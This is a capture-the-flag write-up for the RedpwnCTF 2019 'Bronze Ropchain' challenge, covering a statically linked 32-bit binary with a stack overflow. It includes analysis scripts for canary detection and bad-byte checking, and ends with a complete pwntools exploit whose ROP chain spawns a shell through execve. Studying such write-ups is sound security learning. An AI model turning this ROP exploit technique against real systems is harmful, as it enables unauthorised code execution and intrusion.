2019 RedpwnCTF Bronze Ropchain


Author: 111p1kk | Published 2019-08-18 16:27, 0 reads

    This challenge deserves a quick write-up, thanks to Master Meng's pointers today hehe orz,
    because it is a little different.


    checksec

    kk@ubuntu:~/Desktop/black/CTF/RedpwnCTF/Bronze Ropchain$ checksec ./bronze_ropchain 
    [*] '/home/kk/Desktop/black/CTF/RedpwnCTF/Bronze Ropchain/bronze_ropchain'
        Arch:     i386-32-little
        RELRO:    Partial RELRO
        Stack:    Canary found
        NX:       NX enabled
        PIE:      No PIE (0x8048000)
    

    file/ldd

    kk@ubuntu:~/Desktop/black/CTF/RedpwnCTF/Bronze Ropchain$ file ./bronze_ropchain 
    ./bronze_ropchain: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=16a9964f0e243870ebccdaf50522bcee80741083, not stripped
    
    kk@ubuntu:~/Desktop/black/CTF/RedpwnCTF/Bronze Ropchain$ ldd ./bronze_ropchain 
        not a dynamic executable
    

    Both commands show that the binary is statically linked.
    ida
    The bug is easy to find: a stack overflow.



    P.S.: When I saw the canary was enabled I wanted to leak it first, but... no need: the binary is statically linked, and in IDA there is no readgsdword (Master Meng taught me that hahaha), so there is no canary here.
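    The checksec output above reports "Canary found", yet the overflow works without a leak. pwntools' checksec keys on the presence of the __stack_chk_fail symbol, which a statically linked libc brings in whether or not the vulnerable function itself was compiled with -fstack-protector; the reliable check is per function: does the body load the canary from %gs:0x14 (or %fs:0x28 on x86-64)? The script below is an added example, not from the original post: it walks `objdump -d` output and reports that per function. SAMPLE_OBJDUMP is constructed, not the challenge binary's disassembly.

```python
import re
import sys

# Constructed sample of `objdump -d` output for a 32-bit x86 ELF (not the
# challenge binary): one function that sets up and checks a stack canary, and
# one that reads input into a stack buffer without any canary at all.
SAMPLE_OBJDUMP = """\
08048500 <protected_fn>:
 8048500:\t55                   \tpush   %ebp
 8048501:\t89 e5                \tmov    %esp,%ebp
 8048503:\t83 ec 28             \tsub    $0x28,%esp
 8048506:\t65 a1 14 00 00 00    \tmov    %gs:0x14,%eax
 804850c:\t89 45 f4             \tmov    %eax,-0xc(%ebp)
 804850f:\t8b 45 f4             \tmov    -0xc(%ebp),%eax
 8048512:\t65 33 05 14 00 00 00 \txor    %gs:0x14,%eax
 8048519:\t74 05                \tje     8048520 <protected_fn+0x20>
 804851b:\te8 a0 0c 00 00       \tcall   80491c0 <__stack_chk_fail>
 8048520:\tc9                   \tleave
 8048521:\tc3                   \tret

08048530 <main>:
 8048530:\t55                   \tpush   %ebp
 8048531:\t89 e5                \tmov    %esp,%ebp
 8048533:\t83 ec 18             \tsub    $0x18,%esp
 8048536:\te8 c5 fe ff ff       \tcall   8048400 <gets>
 804853b:\tc9                   \tleave
 804853c:\tc3                   \tret
"""

# A function header in objdump output: "<address> <name>:" at column 0.
FUNC_HEADER = re.compile(r"^([0-9a-f]+) <([^>+]+)>:\s*$")
# The TLS canary slot: %gs:0x14 on 32-bit glibc, %fs:0x28 on x86-64.
# Matches both AT&T (%gs:0x14) and Intel (DWORD PTR gs:0x14) syntax.
CANARY_LOAD = re.compile(r"%?[gf]s:0x(?:14|28)\b")


def canary_by_function(objdump_text):
    """Map each function name to True if its body touches the canary slot,
    i.e. if that function was actually built with -fstack-protector."""
    result = {}
    current = None
    for line in objdump_text.splitlines():
        m = FUNC_HEADER.match(line)
        if m:
            current = m.group(2)
            result[current] = False
            continue
        if current is not None and CANARY_LOAD.search(line):
            result[current] = True
    return result


def unprotected_functions(objdump_text):
    """Sorted names of functions that never load the canary."""
    return sorted(name for name, has in canary_by_function(objdump_text).items() if not has)


def mentions_stack_chk_fail(objdump_text):
    """True if __stack_chk_fail appears anywhere in the listing. This is the
    binary-wide signal checksec reports; it says nothing about a given function."""
    return "__stack_chk_fail" in objdump_text


if __name__ == "__main__":
    # Usage: python3 canary_check.py dis.txt   (output of: objdump -d ./binary > dis.txt)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_OBJDUMP
    print("__stack_chk_fail present: %s" % mentions_stack_chk_fail(text))
    for name, has in canary_by_function(text).items():
        print("%-20s canary: %s" % (name, "yes" if has else "NO"))
```

    On the sample the listing does contain __stack_chk_fail (so a symbol-based checksec would say "Canary found") while main is reported unprotected, which is exactly the situation in this challenge. On a real static binary the listing holds thousands of libc functions, so filter the output for the function that handles user input.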
    Let's run it and see.

    kk@ubuntu:~/Desktop/black/CTF/RedpwnCTF/Bronze Ropchain$ ./bronze_ropchain 
    What is your name?
    kkkkk
    Hello kkkkk
    ! How are you on this fine day?
    
    

    The input is under 0x400 bytes, and you can see the input function truncates at \x0a.
    So we use ROPgadget to find a ropchain:

    ROPgadget --binary ./bronze_ropchain --badbytes '00|0a' --ropchain
    

    The badbytes parameter asks for a ropchain that contains no \x00 or \x0a bytes.
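    Why those two bytes matter: the chain travels through a line-oriented read that stops at \x0a, and a NUL would end the C string, so a single gadget address containing either byte silently cuts the chain short. The following is an added example, not from the original post and not part of ROPgadget: it packs each chain entry the same way the exploit does and reports which entries carry a forbidden byte. PAGE_GADGETS holds the addresses from the exploit on this page; the two CONSTRUCTED_BAD values are made up to show what a hit looks like.

```python
from struct import pack

# Bytes the input path cannot carry: the read stops at newline (0x0a) and a
# C string ends at NUL (0x00). This is the set given to ROPgadget --badbytes.
BAD_BYTES = frozenset([0x00, 0x0a])

# The distinct 32-bit values used by the exploit chain above, with ROPgadget's comments.
PAGE_GADGETS = [
    (0x0806ef2b, "pop edx ; ret"),
    (0x080da060, "@ .data"),
    (0x080564b4, "pop eax ; pop edx ; pop ebx ; ret"),
    (b"/bin", "'/bin'"),
    (0x41414141, "padding"),
    (0x08056fe5, "mov dword ptr [edx], eax ; ret"),
    (0x080da064, "@ .data + 4"),
    (b"//sh", "'//sh'"),
    (0x080da068, "@ .data + 8"),
    (0x080565a0, "xor eax, eax ; ret"),
    (0x080481c9, "pop ebx ; ret"),
    (0x0806ef52, "pop ecx ; pop ebx ; ret"),
    (0x0807c3ba, "inc eax ; ret"),
    (0x080495b3, "int 0x80"),
]

# Constructed values (not addresses from the binary) that would break the chain.
CONSTRUCTED_BAD = [
    (0x08048000, "constructed: low byte is 0x00"),
    (0x0804830a, "constructed: low byte is 0x0a"),
]


def to_word(value):
    """Pack one chain entry as a 4-byte little-endian word, as the exploit does."""
    if isinstance(value, int):
        return pack("<I", value)
    if len(value) != 4:
        raise ValueError("chain entries must be exactly 4 bytes: %r" % (value,))
    return bytes(value)


def find_bad_bytes(data, bad=BAD_BYTES):
    """(offset, byte) for every forbidden byte in a byte string."""
    return [(i, b) for i, b in enumerate(bytearray(data)) if b in bad]


def check_chain(gadgets, bad=BAD_BYTES):
    """(index, comment, offset, byte) for every chain entry that contains a forbidden byte."""
    hits = []
    for idx, (value, comment) in enumerate(gadgets):
        for off, b in find_bad_bytes(to_word(value), bad):
            hits.append((idx, comment, off, b))
    return hits


def build_chain(gadgets):
    """Concatenate the packed entries, mirroring the exploit's p += pack(...) lines."""
    return b"".join(to_word(v) for v, _ in gadgets)


if __name__ == "__main__":
    print("page chain: %d bad bytes" % len(check_chain(PAGE_GADGETS)))
    for idx, comment, off, b in check_chain(PAGE_GADGETS + CONSTRUCTED_BAD):
        print("entry %2d (%s): byte 0x%02x at offset %d" % (idx, comment, b, off))
```

    The page's own addresses come back clean, as ROPgadget's --badbytes filter guarantees; the check is also useful after hand-editing a chain, since a single replaced gadget can reintroduce a 0x0a in the low byte that the newline-terminated read then swallows.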


    Exploit 👇

    #!/usr/bin/env python
    from pwn import *
    from struct import pack

    # io = remote('chall2.2019.redpwn.net', 4004)
    io = process('./bronze_ropchain')

    io.recv()

    # ROPgadget chain: write "/bin//sh\0" into .data, then execve(.data, &NULL, &NULL)
    p = b''
    p += pack('<I', 0x0806ef2b) # pop edx ; ret
    p += pack('<I', 0x080da060) # @ .data
    p += pack('<I', 0x080564b4) # pop eax ; pop edx ; pop ebx ; ret
    p += b'/bin'
    p += pack('<I', 0x080da060) # padding without overwrite edx
    p += pack('<I', 0x41414141) # padding
    p += pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret
    p += pack('<I', 0x0806ef2b) # pop edx ; ret
    p += pack('<I', 0x080da064) # @ .data + 4
    p += pack('<I', 0x080564b4) # pop eax ; pop edx ; pop ebx ; ret
    p += b'//sh'
    p += pack('<I', 0x080da064) # padding without overwrite edx
    p += pack('<I', 0x41414141) # padding
    p += pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret
    p += pack('<I', 0x0806ef2b) # pop edx ; ret
    p += pack('<I', 0x080da068) # @ .data + 8
    p += pack('<I', 0x080565a0) # xor eax, eax ; ret
    p += pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret  (NUL terminator)
    p += pack('<I', 0x080481c9) # pop ebx ; ret
    p += pack('<I', 0x080da060) # @ .data  -> ebx = "/bin//sh"
    p += pack('<I', 0x0806ef52) # pop ecx ; pop ebx ; ret
    p += pack('<I', 0x080da068) # @ .data + 8  -> ecx = argv (points at NULL)
    p += pack('<I', 0x080da060) # padding without overwrite ebx
    p += pack('<I', 0x0806ef2b) # pop edx ; ret
    p += pack('<I', 0x080da068) # @ .data + 8  -> edx = envp (points at NULL)
    p += pack('<I', 0x080565a0) # xor eax, eax ; ret
    p += pack('<I', 0x0807c3ba) # inc eax ; ret  (11 times: eax = 11 = execve)
    p += pack('<I', 0x0807c3ba) # inc eax ; ret
    p += pack('<I', 0x0807c3ba) # inc eax ; ret
    p += pack('<I', 0x0807c3ba) # inc eax ; ret
    p += pack('<I', 0x0807c3ba) # inc eax ; ret
    p += pack('<I', 0x0807c3ba) # inc eax ; ret
    p += pack('<I', 0x0807c3ba) # inc eax ; ret
    p += pack('<I', 0x0807c3ba) # inc eax ; ret
    p += pack('<I', 0x0807c3ba) # inc eax ; ret
    p += pack('<I', 0x0807c3ba) # inc eax ; ret
    p += pack('<I', 0x0807c3ba) # inc eax ; ret
    p += pack('<I', 0x080495b3) # int 0x80
    # 0x18 + 4 bytes of padding up to the saved return address, then the chain
    payload = b"a" * 0x18 + b"a" * 4 + p

    io.sendline(payload)
    io.sendline(b'')

    io.interactive()
    

Link: https://www.haomeiwen.com/subject/ytwrsctx.html